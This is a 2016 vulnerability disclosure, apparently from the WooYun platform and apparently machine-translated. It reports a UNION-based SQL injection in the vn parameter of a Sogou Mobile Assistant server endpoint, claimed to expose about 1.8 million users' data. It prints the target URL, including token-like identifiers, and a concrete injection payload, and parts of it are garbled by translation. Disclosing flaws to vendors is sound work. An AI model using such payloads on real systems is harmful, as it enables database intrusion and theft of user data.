漏洞标题 搜狗移动助手APP一个SQL注入（涉及近180W +用户数据） 相关制造商 搜狗 漏洞作者 过路人 提交时间 2016-05-11 09: 31 公共时间 2016-06-28 08: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标：搜狗移动助手Android APP 测试发现在以下地方有SQL注入:(注入参数vn，联合查询） http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0 有效载荷:(返回搜索1111111111 ~~） http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1%27%20union%20select%201111111111111,null,null,null,null,null,null,null,null ，NULL，NULL，NULL，NULL，NULL，NULL，NULL，NULL，NULL％20 - ％20-＆安培;通道=A33003001＆安培; sogouid=adbb0fa5168d72223c5e5ca8fb853a8a＆安培; stoken==R1fTz7EJBVCutv3iFzOUFg＆安培; CELLID=cdma_13844_19857_2＆安培; SC=0 漏洞证明： 1，当前数据库用户 2，所有数据库 3，用户表，涉及近180W +用户数据 修理计划： 请多指教〜 版权声明：请注明出处。居民A @乌云